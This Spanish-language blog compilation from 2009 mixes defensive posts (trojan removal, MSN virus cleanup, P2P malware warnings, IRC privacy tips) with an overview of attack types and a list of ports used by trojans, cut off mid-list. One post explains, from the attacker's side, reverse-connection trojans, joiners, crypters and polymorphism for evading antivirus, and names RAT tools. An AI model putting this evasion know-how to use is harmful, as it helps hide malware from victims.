-No enviando ni aceptando archivos por DCC ni DCC chat de nicks que no conozcamos, y que no sean de nuestra absoluta confianza, y, aún en ése caso, asegurarnos bien que ése nick es la persona que nosotros creemos y no algún lamer que se ha puesto el nick de nuestro amigo. Para ello utilizaremos el comando:

/msg nick status nick_de_nuestro_amigo

Sólo si nos responde

STATUS nick_de_nuestro_amigo 3 (Identificado)

podremos estar seguros de que efectivamente ésa persona es quien nosotros creemos.

-No visitar páginas. web de personas q no sean de confianza (si estas páginas están en servidores propios), porque cuando accedes al server se loguea tu ip.

-No entrando en servidores de irc inseguros, que no tengan servicio de ips virtuales, servidores de "amiguetes" y, mucho menos aún, si nos dice alguien que no sea de nuestra total confianza "oye he montado un servidor de irc, entra a verlo". no olvidemos que los administradores de los servidores de irc pueden ver nuestra ip real.

-Desactivando el comando !seen en nuestro script.

Cómo quitar manualmente el troyano de un sistema infectado

2009-11-11T14:02:00.000+01:00

1. Con el REGEDIT (Inicio, Ejecutar, REGEDIT y Enter) localice las siguientes ramas:

HKEY_LOCAL_MACHINE
Software
Microsoft
Windows
CurrentVersion
Run

HKEY_LOCAL_MACHINE
Software
Microsoft
Windows
CurrentVersion
RunServices

Borre la carpeta "RunDLL32r" si aparece en alguna de las dos ramas mencionadas.

2. Con el REGEDIT localice las siguientes ramas:

HKEY_LOCAL_MACHINE
Software
Microsoft
Active Setup
Installed Components

Borre las entradas "%random" y "name%" si aparecen allí

3. Con el REGEDIT localice la siguiente rama:

HKEY_LOCAL_MACHINE
Software
Microsoft
Windows
Currentversion
explorer
User shell folders

Borre la entrada "Common Startup" en la ventana de la derecha

4. Desde Inicio, Ejecutar, teclee SYSTEM.INI (más Enter), y modifique la siguiente entrada (nombre_servidor puede ser cualquier nombre dado al servidor del troyano):

[boot]
shell=Explorer.exe c:\windows\system\nombre_servidor.exe

Cámbiela por la siguiente:

[boot]
shell=Explorer.exe

5. Desde Inicio, Ejecutar, teclee WIN.INI (más Enter), y modifique la siguiente entrada:

[Windows]
load=c:\windows\system\nombre_servidor.exe

Cambiándola por la siguiente:

[windows]
load=

6. Borre el archivo C:\EXPLORER.EXE

Importante: No confunda C:\EXPLORER.EXE con C:\WINDOWS\EXPLORER.EXE que es el Explorador de Windows.

7. Reinicie la computadora

8. Borre el archivo del troyano, ("nombre_servidor.exe", donde "nombre_servidor" puede ser cualquier nombre dado al servidor), de la carpeta C:\WINDOWS\SYSTEM

Fuentes: Dark Eclipse, Panda

Abrir Puertos

2009-11-09T12:36:00.000+01:00

Bueno este post esta claro,como abrir los puertos para tus juegos o programas p2p,emule,bitcoment,utorrent,ect...............................

Primero debeis poner ipconfig para sacar vuestra puerta de enlace

ejecutar > cmd >ipconfig

despues entrar en el explorador y pones tu puerta de enlace y os pediran el login y la contraseña
poner la vuestra (suelen ser standar 1234,1234) y ya estais dentro del router

Aqui teneis los router hay 77 si teneis alguna duda dejar comentario o mandar MP

// * 3COM
-----------------------

- 3Com 812 ____________ > http://www.adslzone.net/3com812.html

- 3Com 11 G Wireless ____ > http://www.adslzone.net/3com11g.html

- 3Com 3CRWDR100Y72 __ > http://www.adslzone.net/3Com3CRWDR100Y72.html

=================================================================

// * ALCATEL
-----------------------

- Alcatel Speed Touch ____ > http://www.adslzone.net/alcatel.html

=================================================================

// * BELKIN
------------------------

- Belkin 802.11B __________ > http://www.adslzone.net/belkin802-11b.html

- Belkin 802.11G __________ > http://www.adslzone.net/belkin802-11g.html

==================================================================

// * BENQ
-------------------------

- Benq ESG 103 ___________ > http://www.adslzone.net/benq.htm

==================================================================

// * CISCO SYSTEMS
-------------------------

- Cisco 827 _______________ > http://www.adslzone.net/cisco827.html

===================================================================

// * CNET
-------------------------

- CNet CAR-854 ____________ > http://www.adslzone.net/cnetcar.html

- CNet CWR-854 ____________ > http://www.adslzone.net/cnetcwr.html

====================================================================

// * COMTREND
-------------------------

- Comtrend 500 _____________ > http://www.adslzone.net/comtrend500.html

- Comtrend 535 _____________ > http://www.adslzone.net/comtrend535.html

- Comtrend 536+ ____________ > http://www.adslzone.net/comtrend536.html

- Comtrend 561 _____________ > http://www.adslzone.net/comtrend561.html

- Comtrend 5071 ____________ > http://www.adslzone.net/comtrend5071.html

=====================================================================

// * CONCEPTRONIC
--------------------------

- Conceptronic C54APRA ______ > http://www.adslzone.net/conceptronicC54APRA.html

- Conceptronic CADSLR4 ______ > http://www.adslzone.net/conceptronicCADSLR4.html

- Conceptronic C54BRS4 ______ > http://www.adslzone.net/conceptronicC54BRS4.html

- Concept. C54APRA2+ _______ > http://www.adslzone.net/conceptronic-C54APRA2+.html

======================================================================

// * CONEXANT
---------------------------

- Conexant CX82310 __________ > http://www.adslzone.net/conexant.html

======================================================================

// * CONNECTION N&C
---------------------------

- N&C RWGD45 _______________ > http://www.adslzone.net/nc.html

=======================================================================

// * D-LINK
---------------------------

- D-Link 500 __________________ > http://www.adslzone.net/d-link500.html

- D-Link 504G _________________ > http://www.adslzone.net/d-link504g.html

- D-Link 504T _________________ > http://www.adslzone.net/d-link504t.html

- D-Link 524T _________________ > http://www.adslzone.net/d-link524t.html

- D-Link G604T ________________ > http://www.adslzone.net/d-linkg604t.html

- D-Link 614 __________________ > http://www.adslzone.net/d-link614.html

- D-Link 624 __________________ > http://www.adslzone.net/d-link624.html

- D-Link G624T ________________ > http://www.adslzone.net/D-Link_DSL-G624T.html

========================================================================

// * HUAWEI
---------------------------

- Huawei SmartAX MT882 ________ > http://www.adslzone.net/huawei.html

- Huawei HG520 ________________ > http://www.adslzone.net/huaweiHG520.html

- H. Echolife HG520V ____________ > http://www.adslzone.net/huawei-echolife ... vdsl2.html

=========================================================================

// * INVENTEL
---------------------------

- Inventel DW-B-200 ____________ > http://www.adslzone.net/inventel.html

=========================================================================

// * LINKSYS
---------------------------

- Linksys BEFSR41 _______________ > http://www.adslzone.net/linksys-befsr41.html

- Linksys WAG54G _______________ > http://www.adslzone.net/linksys-wag.html

- Linksys WAG354G ______________ > http://www.adslzone.net/linksys-WAG354G.html

- Linksys WRT54G _______________ > http://www.adslzone.net/linksys-wrt.html

- Linksys AG241 _________________ > http://www.adslzone.net/linksys-ag241.html

=========================================================================

// * NETGEAR
----------------------------

- Netgear DG834G ________________ > http://www.adslzone.net/netgearDG834G.html

=========================================================================

// * NOKIA
----------------------------

- Nokia M1112 ____________________ > http://www.adslzone.net/nokia.html

=========================================================================

// * OVISLINK
----------------------------

- Ovislink DR-WG4S ________________ > http://www.adslzone.net/ovislink.html

=========================================================================

// * SMC
----------------------------

- SMC 7204 BRA ___________________ > http://www.adslzone.net/smc7204.html

- SMC 7804 WBRA __________________ > http://www.adslzone.net/smc7804.html

- SMC 7401 BRA ____________________ > http://www.adslzone.net/smc7401Bra.html

- SMC 7904W BRA __________________ > http://www.adslzone.net/SMC-7904WBRA.html

==========================================================================

// * SAGEM COMMUNICATION
----------------------------

- Sagem Fast 1200 __________________ > http://www.adslzone.net/sagem-Fast-1200.html

- Sagem 1500 ______________________ > http://www.adslzone.net/sagem1500.html

==========================================================================

// * SIEMENS
----------------------------

- Speedstream 5200 _________________ > http://www.adslzone.net/speedstream5200.html

- Speedstream 5660 _________________ > http://www.adslzone.net/speedstream5660.html

==========================================================================

// * SUPERGRASS
----------------------------

- Supergrass DYN04+ _________________ > http://www.adslzone.net/supergrassdyn04.html

==========================================================================

// * TELSEY
----------------------------

- Telsey CPVA500 ____________________ > http://www.adslzone.net/telseyCPVA500.html

==========================================================================

// * THOMSON
----------------------------

- Thomson 510 _______________________ > http://www.adslzone.net/thomson510.html

- Thomson ST580i ____________________ > http://www.adslzone.net/thomsonst580i.html

- Thomson 530 _______________________ > http://www.adslzone.net/thomson530.html

- Thomson 545 _______________________ > http://www.adslzone.net/thomson545.html

- Thomson 546 _______________________ > http://www.adslzone.net/thomson546.html

- Thomson TcW 710 ___________________ > http://www.adslzone.net/thomsonTCW720.html

===========================================================================

// * U.S.ROBOTICS
----------------------------

- US Robotics 9003 ____________________ > http://www.adslzone.net/robotics9003.html

- US Robotics 9105 ____________________ > http://www.adslzone.net/robotics9105.html

- US Robotics 9110 ____________________ > http://www.adslzone.net/robotics9110.html

===========================================================================

// * DRAYTEK
----------------------------

- DrayTek Vigor 2600 ___________________ > http://www.adslzone.net/vigor2600.html

===========================================================================

// * SCIENTIFIC ATLANTA
----------------------------

- Webstar 2320 ________________________ > http://www.adslzone.net/webstar2320.html

===========================================================================

// * XAVI
----------------------------

- Xavi x7028r Wireless ___________________ > http://www.adslzone.net/xavi7028.html

- Xavi x7768r Wireless ___________________ > http://www.adslzone.net/xavi7768r.html

- Xavi x7868r Wireless ___________________ > http://www.adslzone.net/xavi7868r.html

- Xavi x8121r Wireless ___________________ > http://www.adslzone.net/xavi8121r.html

============================================================================

// * ZOOM
-----------------------------

- Zoom X5 _____________________________ > http://www.adslzone.net/zoomX5.html

- Zoom X5 5554A _______________________ > http://www.adslzone.net/zoomX55554A.html

- Zoom X6 _____________________________ > http://www.adslzone.net/zoomX6.html

============================================================================

// * ZYXEL
-----------------------------

- Zyxel P623-41 ________________________ > http://www.adslzone.net/zyxel623-41.html

- Zyxel P643 ____________________________ > http://www.adslzone.net/zyxel643.html

- Zyxel P645R-A1 ________________________ > http://www.adslzone.net/zyxel645.html

- Zyxel P650HW _________________________ > http://www.adslzone.net/zyxel650.html

- Zyxel P660HW _________________________ > http://www.adslzone.net/zyxel660.html

- Zyxel P660H-D1 ________________________ > http://www.adslzone.net/configurar-zyxel660h-d1.html

- Zyxel P660HW-D1 ______________________ > http://www.adslzone.net/zyxel660hw-d1.html

- ZyAir G-2000 __________________________ > http://www.adslzone.net/zyxel-airG2000.html

fuente: indetectables.net

CÓMO ELIMINAR LOS VIRUS QUE ENTRAN POR WINDOWS LIVE MESSENGER

2009-11-05T12:41:00.000+01:00

“Lobos con piel de cordero”: Este tipo de virus se propaga a través de “aparentemente inofensivos” archivos de fotos (.jpg, .jpeg, .gif, etc.) que son enviados mediante enlaces, bien por alguno de nuestros contactos o bien por desconocidos que han accedido a nuestra dirección de correo hotmail, mientras chateamos (mensaje instantáneo) o en un mensaje normal con el programa Windows Live Messenger; cuando en realidad son auténticos ejecutables (.exe), ya que, al pinchar sobre ellos, introducirán el virus en nuestro PC, autoenviarán el enlace que descarga el virus en un mensaje instantáneo a los contactos de nuestra lista e inutilizarán por completo el programa Messenger.

PROCESO DE DEINFECCIÓN Y REPARACIÓN DE WINDOWS LIVE MESSENGER:

1. Descarga la utilidad MSNFix

2. Abre la carpeta MSNFix y descomprime (extrae) el contenido en C:\MSNFix
(deberás crear la carpeta) pulsando sobre MSNFix.bat.

3. Abre la nueva carpeta C:\MSNFix y haz clic sobre MSNFix.bat

4. En la ventana en modo MS-DOS, escoge el idioma español pulsando la tecla C y presiona ENTER.

5. Haz clic sobre la tecla R y presiona ENTER para comenzar el proceso de detección (búsqueda).

6. Cuando haya finalizado, indicará lo siguiente:

# “No encontrado”: No se ha encontrado ningún programa malintencionado. Pulsa la letra Q para salir.
# “Infección presente o detectada”: Presiona la tecla N para comenzar el proceso de desinfección.

7. Una vez finalizada la desinfección, se abrirá un informe (log) .txt indicando los archivos y claves del registro relacionados con el virus que han sido eliminados.
Por último, reinicia el PC para guardar los cambios.

Esto es todo

fuente: lestathijackthis.wordpress.com

Mi mulita me engaña

2009-11-03T12:51:00.000+01:00

Cualquier persona que esté relacionada con la tecnología conocerá el poder de las redes P2P, sea cual sea el motivo para el cual las usa.

Lo importante en este caso es conocer que estas redes también son utilizadas para propagar malware. Por ejemplo a continuación se busca un libro y como puede verse en la imagen, aparecen dos grupos perfectamente definidos: por un lado aparecen archivos con gran cantidad de disponibilidad (más de 4.000 fuentes) y por el otro, archivos con baja disponibilidad:

Cualquier usuario tendería a descargar aquellos archivos con alta disponibilidad y con esto caerá en la trampa tendida por los diseminadores de malware. Estos archivos aparecen con nombre aleatorio, y generalmente muy llamativos, sea cual sea la búsqueda realizada originalmente.

Estos archivos en realidad son adware, spyware, programas rogue, falsos codecs y toda una parafernalia de archivos dañinos de diferente tipo.

Aconsejamos prestar especial atención en este detalle para no terminar descargando un malware, bajo la creencia que es el último libro de Shakespeare.

Fuente: blogs.eset-la.com

Tipos de ataques hacking

2009-11-01T11:09:00.000+01:00

Ahora les dejo algunos de los tipos de ataques que puede sufrir un sistema en la red son tipos de ataque que puede sufrir o mejor aun que podemos hacer, no son explicaciones tecnicas ni descripciones de como hacer un ataque, por ahora solo les dejo esto como cultura general

Los métodos de ataque descritos a continuación están divididos en categorías generales que pueden estar relacionadas entre sí, ya que el uso de un método en una categoría permite el uso de otros métodos en otras. Por ejemplo: después de hackear un password, un intruso realiza un login como usuario legítimo para navegar entre los archivos y explotar vulnerabilidades del sistema. Eventualmente también, el atacante puede adquirir derechos a lugares que le permitan dejar un virus u otras bombas lógicas para paralizar todo un sistema antes de huir.

EAVESDROPPING Y PACKET SNIFFING

Muchas redes son vulnerables al eavesdropping, o la pasiva intercepción (sin modificación) del tráfico de red. En Internet esto es realizado por packet sniffers, que son programas que monitorean los paquetes de red que están direccionados a la **** donde están instalados. El sniffer puede ser colocado tanto en una estación de trabajo conectada a red, como a un equipo router o a un gateway de Internet, y esto puede ser realizado por un usuario con legítimo acceso, o por un intruso que ha ingresado por otras vías. Existen kits disponibles para facilitar su instalación.
Este método es muy utilizado para capturar logins, IP‘s y passwords de usuarios, que generalmente viajan claros (sin encriptar) al ingresar a sistemas de acceso remoto (RAS). También son utilizados para capturar números de tarjetas de crédito y direcciones de e-mail entrantes y salientes. El análisis de tráfico puede ser utilizado también para determinar relaciones entre organizaciones e individuos.

SNOOPING Y DOWNLOADING

Los ataques de esta categoría tienen el mismo objetivo que el sniffing, obtener la información sin modificarla. Sin embargo los métodos son diferentes. Además de interceptar el tráfico de red, el atacante ingresa a los documentos, mensajes de e-mail y otra información guardada, realizando en la mayoría de los casos un downloading de esa información a su propia ****.
El Snooping puede ser realizado por simple curiosidad, pero también es realizado con fines de espionaje y robo de información o software. Los casos más resonantes de este tipo de ataques fueron: el robo de un archivo con mas de 1700 números de tarjetas de crédito desde una compañía de música Mundialmente famosa, y la difusión ilegal de reportes oficiales reservados de las Naciones Unidas, acerca de la violación de derechos humanos en algunos países europeos en estado de guerra.

TAMPERING O DATA DIDDLING

Esta categoría se refiere a la modificación desautorizada a los datos, o al software instalado en un sistema, incluyendo borrado de archivos. Este tipo de ataques son particularmente serios cuando el que lo realiza ha obtenido derechos de administrador o supervisor, con la capacidad de disparar cualquier comando y poder alterar o borrar cualquier información que puede incluso terminar en la baja total del sistema en forma deliberada. O aún si no hubo intenciones de ello, el administrador posiblemente necesite dar de baja por horas o días hasta chequear y tratar de recuperar aquella información que ha sido alterada o borrada. Como siempre, esto puede ser realizado por insiders o outsiders, generalmente con el propósito de fraude o dejar fuera de servicio un competidor.
Son innumerables los casos de este tipo como empleados (o externos) bancarios que crean falsas cuentas para derivar fondos de otras cuentas, estudiantes que modifican calificaciones de exámenes, o contribuyentes que pagan para que se les anule la deuda por impuestos en el sistema municipal.
Múltiples web han sido víctimas del cambio de sus home page por imágenes terroristas o humorísticas, o el reemplazo de versiones de software para cambiarlos por otros con el mismo nombre pero que incorporan código malicioso (virus, troyanos).
La utilización de programas troyanos esta dentro de esta categoría, y refiere a falsas versiones de un software con el objetivo de averiguar información, borrar archivos y hasta tomar control remoto de una **** a través de Internet.

SPOOFING

Esta técnica es utilizada para actuar en nombre de otros usuarios, usualmente para realizar tareas de snoofing o tampering. Una forma común de spoofing, es conseguir el nombre y password de un usuario legítimo para, una vez ingresado al sistema, tomar acciones en nombre de él, como puede ser el envío de falsos e-mails.
El intruso usualmente utiliza un sistema para obtener información e ingresar en otro, y luego utiliza este para entrar en otro, y en otro. Este proceso, llamado Looping, tiene la finalidad de evaporar la identificación y la ubicación del atacante. El camino tomado desde el origen hasta el destino puede tener muchas estaciones, que exceden obviamente los límites de un país. Otra consecuencia del looping es que una compañía o gobierno pueden suponer que están siendo atacados por un competidor o una agencia de gobierno extranjera, cuando en realidad están seguramente siendo atacado por un insider, o por un estudiante a miles de Km. de distancia, pero que ha tomado la identidad de otros.
El looping hace su investigación casi imposible, ya que el investigador debe contar con la colaboración de cada administrador de cada red utilizada en la ruta, que pueden ser de distintas jurisdicciones.
Los protocolos de red también son vulnerables al spoofing. Con el IP spoofing, el atacante genera paquetes de Internet con una dirección de red falsa en el campo From, pero que es aceptada por el destinatario del paquete.
El envío de falsos e-mails es otra forma de spoofing permitida por las redes. Aquí el atacante envía a nombre de otra persona e-mails con otros objetivos. Tal fue el caso de una universidad en USA que en 1998 debió reprogramar una fecha completa de exámenes ya que alguien en nombre de la secretaría había cancelado la fecha verdadera y enviado el mensaje a toda la nómina (163 estudiantes).

JAMMING o FLOODING

Este tipo de ataques desactivan o saturan los recursos del sistema. Por ejemplo, un atacante puede consumir toda la memoria o espacio en disco disponible, así como enviar tanto tráfico a la red que nadie más puede utilizarla.
Muchos ISPs (proveedores de Internet) han sufrido bajas temporales del servicio por ataques que explotan el protocolo TCP. Aquí el atacante satura el sistema con mensajes que requieren establecer conexión. Sin embargo, en vez de proveer la dirección IP del emisor, el mensaje contiene falsas direcciones IP (o sea que este ataque involucra también spoofing). El sistema responde al mensaje, pero como no recibe respuesta, acumula buffers con información de las conexiones abiertas, no dejando lugar a las conexiones legítimas.
Muchos servidores de Internet han sido dados de baja por el “ping de la muerte”, una versión-trampa del comando ping. Mientras que el ping normal simplemente verifica si un sistema esta enlazado a la red, el ping de la muerte causa el reinicio o el apagado instantáneo del equipo.
Otra acción común es la de enviar millares de e-mails sin sentido a todos los usuarios posibles en forma continua, saturando los distintos servidores de destino.

BOMBAS LOGICAS

Este suele ser el procedimiento de sabotaje mas comúnmente utilizado por empleados descontentos. Consiste en introducir un programa o rutina que en una fecha determinada destruirá, modificara la información o provocara el cuelgue del sistema.

INGENIERA SOCIAL

Básicamente convencer a la gente de que haga lo que en realidad no debería. Por ejemplo llamar a un usuario haciéndose pasar por administrador del sistema y requerirle la password con alguna excusa convincente. Esto es común cuando en el Centro de **** los administradores son amigos o conocidos.

DIFUSION DE VIRUS

Si bien es un ataque de tipo tampering, difiere de este porque puede ser ingresado al sistema por un dispositivo externo (diskettes) o través de la red (e-mails u otros protocolos) sin intervención directa del atacante. Dado que el virus tiene como característica propia su autoreproducción, no necesita de mucha ayuda para propagarse a traves de una LAN o WAN rápidamente, si es que no esta instalada una protección antivirus en los servidores, estaciones de trabajo, y los servidores de e-mail.
Existen distintos tipos de virus, como aquellos que infectan archivos ejecutables (.exe, .com, .bat, etc.) y los sectores de inicio de discos y diskettes, pero aquellos que causan en estos tiempos mas problemas son los macro-virus, que están ocultos en simples documentos o planilla de cálculo, aplicaciones que utiliza cualquier usuario de PC, y cuya difusión se potencia con la posibilidad de su transmisión de un continente a otro a través de cualquier red o Internet. Y además son multiplataforma, es decir, no están atados a un sistema operativo en particular, ya que un documento de MS-Word puede ser procesado tanto en un equipo Windows 3.x/95/98 , como en una Macintosh u otras.
Cientos de virus son descubiertos mes a mes, y técnicas más complejas se desarrollan a una velocidad muy importante a medida que el avance tecnológico permite la creación de nuevas puertas de entrada. Por eso es indispensable contar con una herramienta antivirus actualizada y que pueda responder rápidamente ante cada nueva amenaza.
El ataque de virus es el más común para la mayoría de las empresas, ya que en un gran porcentaje responden afirmativamente cuando se les pregunta si han sido víctimas de algún virus en los últimos 5 años.

fuente: foro.latinohack

El nuevo rival para Windows 7?

2009-10-30T17:06:00.001+01:00

*Canonical ha presentado la revisión 9.10 de su sistema operativo.
*Basado en software libre, incluye varias mejoras.
*Su lanzamiento coincide con el de Windows 7.

La compañía Canonical, responsable de Ubuntu, acaba de anunciar el lanzamiento de la versión 9.10 de ese sistema operativo basado en Linux.

Las primeras pruebas de esta revisión han sido, al parecer, positivas, tal y como apuntan medios especializados como eWeek Europe. Éste destaca "novedades interesantes" en el nuevo Ubuntu, como por ejemplo la mejora en la encriptación de unidades, unas políticas de permisos más exigentes y nuevos servicios en nube.

La página de la compañía explica además, paso a paso, las utilidades que ofrece: desde email, que se complementa con un libro de direcciones y un calendario compatible con MS Outlook, a un chat que se integra con Yahoo, Gmail, MSN, Jabber o AOL entre otros.

Para navegar, escoge Mozilla Firefox 3.5 por "su rapidez y seguridad".

Sus usuarios podrán, asimismo, subir fácilmente a la web sus fotos para compartirlas con los amigos en redes sociales como Flickr, Facebook y Picassa. También posibilita gestionar archivos musicales, crear documentos de trabajo o disfrutar con más de 400 juegos "complemente gratis".

El arranque de esta revisión de Ubuntu coincide con el del nuevo Windows 7, del cual se ha dicho que es "tan bonito como lo que hace Apple y no te trata como un burro". Además, este último ofrece como puntos fuertes una compatibilidad óptima con programas externos, ventanas inteligentes y arranque rápido.

Siguiendo con troyanos

2009-10-27T11:53:00.000+01:00

Bueno hay 2 tipos de troyanos que se explicaran a continuacion:

Troyano de Conexion Directa:

Que quiere decir la conexion directa, significa que nosotros nos conectamos al puerto de la victima, osea esta no se conecta a nosotros, lo cual es algo desventajoso porque lo mas comun es que al ejecutar el server.exe salte el firewall

Troyano Conexion Inversa:

Esto es todo lo opuesto al de la directa, en este caso la victima se conectara a nosotros, lo cual al ejecutar el server.exe no saltara ningun mensaje en la victima, lo cual hace mejor el server.

Los troyanos usan herramientas para ocultarse ya que al ser virus o ejecutables .exe no se pueden mandar por correo y si los descargas enseguida dara alarma de virus ,para eso se usan estas herraminentas:

Joiner,cripter,poliformos,no-ip,exescope,ResHacker,ect......

Definicion de Joiner:

Un joiner es un software utilizado para juntar en un solo archivo varios, este esta conformado por el .exe y el stab

¿ Que es un cripter ?

Un cripter es un programa que encripta o modifica cierto programa, para asi hacerlo indetectable en la mayoria de los casos, hay muchos como por ejemplo el Themida seria uno de los mejores.

¿Que es Poliformismo?

El polimorsimo se resume en que una aplicacion es capaz de cambiar el formato de sus copias haciendo esa copia indetectable a un antivirus. Algo asi como si fuera un crypter que va creando copias de si mismo pero con un algoritmo de encriptacion variable que haga que nunca una copia tenga el formato de otra.

¿Que es una cuenta NO-IP?

El servicio de DNS dinámica de No-IP permite identificar tu PC con un nombre de dominio fácil de recordar, y esto lo utilizan las personas que no tiene una IP estatica, la usan para que para los troyanos de conexion inversa, ya que si se quieren conectar a la IP vieja y esta cambia por decirlo asi, el troyano no se conectara, este servidor lo que hace es como crear una especie de IP que nos conecta al server.

¿Que es el exescope?

Es una utilidad que te ayuda a personalizar una application.Tu puede cambiar el menú, el tipo de letra, un arreglo de dialog.eXeScope puede analizar, visualizar diversa información, y reescribir los recursos de archivos ejecutables, es decir, EXE, DLL, OCX, etc . files.Analyze sin fuente y mostrar archivos ejecutables (EXE, DLL, etc)

¿Que es ResHacker ?

Se usa para modificar a gusto los recursos de diseño de muchas aplicaciones, tales cómo iconos, pantallas de inicio etc.......

En definitiva los hacen indetectables ,pareciendo que es alguna foto o algun video y los anti-virus no lo detectan.

Algunos programas o troyanos

1º - Poison Ivy 2.3.2
2º - Bifrost 1.2.1
3º - Bifrost.v.2.0 Special
4º - Helminth v0.1
5º - Hav-Rat 1.3.2
6º - Lost Door V2.2 Stable Public Edition
7º - PaiN RAT 0.1 Beta 8
8º - RCBF EVA 1.0
9º - S616 Rat
10º - Shark 3.1
11º - Spy-Net [RAT] v1.6
12º - Spy-Net [RAT] v1.7
13º - SpyOne V1.0.1
14º - SynRat
15º - TsuRat
16º - Xploit1.4.5

Puertos utilizados por troyanos

2009-10-24T10:52:00.000+02:00

LISTADO DE PUERTOS:

port 1 (UDP) - Sockets des Troie
port 2 Death
port 20 Senna Spy FTP server
port 21 Back Construction, Blade Runner, Cattivik FTP Server, CC Invader, Dark FTP, Doly Trojan, Fore, Invisible FTP, Juggernaut 42, Larva, MotIv FTP, Net Administrator, Ramen, Senna Spy FTP server, The Flu, Traitor 21, WebEx, WinCrash

port 22 Shaft
port 23 Fire HacKer, Tiny Telnet Server - TTS, Truva Atl
port 25 Ajan, Antigen, Barok, Email Password Sender - EPS, EPS II, Gip, Gris, Happy99, Hpteam mail, Hybris, I love you, Kuang2, Magic Horse, MBT (Mail Bombing Trojan), Moscow Email trojan, Naebi, NewApt worm, ProMail trojan, Shtirlitz, Stealth, Tapiras, Terminator, WinPC, WinSpy

port 30 Agent 40421
port 31 Agent 31, Hackers Paradise, Masters Paradise
port 41 DeepThroat, Foreplay
port 48 DRAT
port 50 DRAT
port 58 DMSetup
port 59 DMSetup
port 79 CDK, Firehotcker
port 80 711 trojan (Seven Eleven), AckCmd, Back End, BackOrifice 2000 Plug-Ins, Cafeini, CGI Backdoor, Executor, God Message, God Message Creator, Hooker, IISworm, MTX, NCX, Reverse WWW Tunnel Backdoor, RingZero, Seeker, WAN Remote, Web Server CT, WebDownloader

port 81 RemoConChubo
port 99 Hidden Port, NCX
port 110 ProMail trojan
port 113 Invisible Identd Deamon, Kazimas
port 119 Happy99
port 121 Attack Bot, God Message, JammerKillah
port 123 Net Controller
port 133 Farnaz
port 137 Chode
port 137 (UDP) - Msinit
port 138 Chode
port 139 Chode, God Message worm, Msinit, Netlog, Network, Qaz
port 142 NetTaxi
port 146 Infector
port 146 (UDP) - Infector
port 170 A-trojan
port 334 Backage
port 411 Backage
port 420 Breach, Incognito
port 421 TCP Wrappers trojan
port 455 Fatal Connections
port 456 Hackers Paradise
port 513 Grlogin
port 514 RPC Backdoor
port 531 Net666, Rasmin
port 555 711 trojan (Seven Eleven), Ini-Killer, Net Administrator, Phase Zero, Phase-0, Stealth Spy
port 605 Secret Service
port 666 Attack FTP, Back Construction, BLA trojan, Cain & Abel, NokNok, Satans Back Door - SBD, ServU, Shadow Phyre, th3r1pp3rz (= Therippers)
port 667 SniperNet
port 669 DP trojan
port 692 GayOL
port 777 AimSpy, Undetected
port 808 WinHole
port 911 Dark Shadow
port 999 Deep Throat, Foreplay, WinSatan
port 1000 Der Späher / Der Spaeher, Direct Connection
port 1001 Der Späher / Der Spaeher, Le Guardien, Silencer, WebEx
port 1010 Doly Trojan
port 1011 Doly Trojan
port 1012 Doly Trojan
port 1015 Doly Trojan
port 1016 Doly Trojan
port 1020 Vampire
port 1024 Jade, Latinus, NetSpy
port 1025 Remote Storm
port 1025 (UDP) - Remote Storm
port 1035 Multidropper
port 1042 BLA trojan
port 1045 Rasmin
port 1049 /sbin/initd
port 1050 MiniCommand
port 1053 The Thief
port 1054 AckCmd
port 1080 WinHole
port 1081 WinHole
port 1082 WinHole
port 1083 WinHole
port 1090 Xtreme
port 1095 Remote Administration Tool - RAT
port 1097 Remote Administration Tool - RAT
port 1098 Remote Administration Tool - RAT
port 1099 Blood Fest Evolution, Remote Administration Tool - RAT
port 1150 Orion
port 1151 Orion
port 1170 Psyber Stream Server - PSS, Streaming Audio Server, Voice
port 1200 (UDP) - NoBackO
port 1201 (UDP) - NoBackO
port 1207 SoftWAR
port 1208 Infector
port 1212 Kaos
port 1234 SubSevenJavaclient, Ultors Trojan
port 1243 BackDoor-G, SubSeven, SubSevenApocalypse, Tiles
port 1245 VooDoo Doll
port 1255 Scarab
port 1256 Project nEXT
port 1269 Matrix
port 1272 TheMatrix
port 1313 NETrojan
port 1338 Millenium Worm
port 1349 Bo dll
port 1394 GoFriller, Backdoor G-1
port 1441 Remote Storm
port 1492 FTP99CMP
port 1524 Trinoo
port 1568 Remote Hack
port 1600 Direct Connection, Shivka-Burka
port 1703 Exploiter
port 1777 Scarab
port 1807 SpySender
port 1966 Fake FTP
port 1967 WM FTP Server
port 1969 OpC BO
port 1981 Bowl, Shockrave
port 1999 Back Door, SubSeven, TransScout
port 2000 Der Späher / Der Spaeher, Insane Network, Last 2000, Remote Explorer 2000, Senna Spy Trojan Generator
port 2001 Der Späher / Der Spaeher, Trojan Cow
port 2023 Ripper Pro
port 2080 WinHole
port 2115 Bugs
port 2130 (UDP) - Mini Backlash
port 2140 The Invasor
port 2140 (UDP) - Deep Throat, Foreplay
port 2155 Illusion Mailer
port 2255 Nirvana
port 2283 Hvl RAT
port 2300 Xplorer
port 2311 Studio 54
port 2330 Contact
port 2331 Contact
port 2332 Contact
port 2333 Contact
port 2334 Contact
port 2335 Contact
port 2336 Contact
port 2337 Contact
port 2338 Contact
port 2339 Contact, Voice Spy
port 2339 (UDP) - Voice Spy
port 2345 Doly Trojan
port 2565 Striker trojan
port 2583 WinCrash
port 2600 Digital RootBeer
port 2716 The Prayer
port 2773 Subseven, SubSeven2.1Gold
port 2774 SubSeven, Sub Seven 2.1 gold
port 2801 Phineas Phucker
port 2989 (UDP) - Remote Administration Tool - RAT
port 3000 Remote Shut
port 3024 WinCrash
port 3031 Microspy
port 3128 Reverse WWW Tunnel Backdoor, RingZero
port 3129 Masters Paradise
port 3150 The Invasor
port 3150 (UDP) - Deep Throat, Foreplay, Mini Backlash
port 3456 Terror trojan
port 3459 Eclipse 2000, Sanctuary
port 3700 Portal of Doom
port 3777 PsychWard
port 3791 Total Solar Eclypse
port 3801 Total Solar Eclypse
port 4000 SkyDance
port 4092 WinCrash
port 4242 Virtual Hacking Machine - VHM
port 4321 BoBo
port 4444 Prosiak, Swift Remote
port 4567 File Nail
port 4590 ICQ Trojan
port 4950 ICQ Trogen (Lm)
port 5000 Back Door Setup, Blazer5, Bubbel, ICKiller, Ra1d, Sockets des Troie
port 5001 Back Door Setup, Sockets des Troie
port 5002 cd00r, Shaft
port 5010 Solo
port 5011 One of the Last Trojans - OOTLT, One of the Last Trojans - OOTLT, modified
port 5025 WM Remote KeyLogger
port 5031 Net Metropolitan
port 5032 Net Metropolitan
port 5321 Firehotcker
port 5333 Backage, NetDemon
port 5343 wCrat - WC Remote Administration Tool
port 5400 Back Construction, Blade Runner
port 5401 Back Construction, Blade Runner
